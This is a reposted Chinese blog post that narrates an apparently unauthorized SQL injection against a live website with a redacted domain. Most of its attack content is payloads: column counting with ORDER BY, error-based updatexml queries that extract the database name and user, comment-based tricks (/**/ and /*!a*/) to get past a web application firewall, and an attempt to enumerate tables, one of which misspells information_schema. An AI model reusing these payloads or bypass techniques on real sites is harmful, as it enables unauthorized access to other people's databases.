一次实战SQL注入过防火墙

其他 2020-03-16 09:37:53 阅读次数: 0

注入点

https://www.xxxx.com/xxxxx?id=16
在其后面添加单引号,数据库报错
在这里插入图片描述添加and 1=1 --+,依然报错,猜测是数字型注入
在这里插入图片描述

猜测字段

?id=16 order by 1,2,3,4,5,6,7,8 --+
在这里插入图片描述

出现Unknown column ‘8’ in 'order clause

去掉8,?id=16 order by 1,2,3,4,5,6,7–+,页面正常
在这里插入图片描述

尝试用一下报错注入

?id=16 and updatexml(1,concat(0x7e,(select database())),0x7e) --+,有墙
在这里插入图片描述

#尝试一下/**/绕过

?id=16 and updatexml(1,concat(0x7e,(select database/**/())),0x7e) --+

在这里插入图片描述

查看用户

?id=16 and updatexml(1,concat(0x7e,(select user/**/())),0x7e) --+
在这里插入图片描述
使用/%!a/也能 绕过,在每个词前面都加/%!a/
id=16%20and%20updatexml(1,concat(0x7e,(/%!a/select%20user/%!a/())),0x7e)%20–+
在这里插入图片描述

查看数据库中的表

id=16 and updatexml(1,concat(0x7e,(select group_concat(table_name)%20 from information_schemata.tables where table_schema=0x666E6A696E657732)),1)–+
被狗拦截了
在这里插入图片描述
测试发现拦截from

在from前使用/**/绕过,发现不行
使用post,多加几个绕过
在这里插入图片描述
在这里插入图片描述

php00py
发布了29 篇原创文章 · 获赞 6 · 访问量 1万+
私信 关注

猜你喜欢

转载自blog.csdn.net/weixin_43886632/article/details/104693756
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
周排行
购置笔记本常识
从源码看Spring Security之采坑笔记(Spring Boot篇)
大数据学习——高可用配置案例
如何避免选择不专业的建站公司?
Euclid's Game HDU - 1525(博弈)
面试笔记(六)---Js实现eventHandler
Windows 实例搭建的 FTP 在外网无法连接和访问
设计模式 : 桥接模式
USB 设备驱动开发之几个重要结构体分析
14-p14_sqrt求平方根
每日归档
更多
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022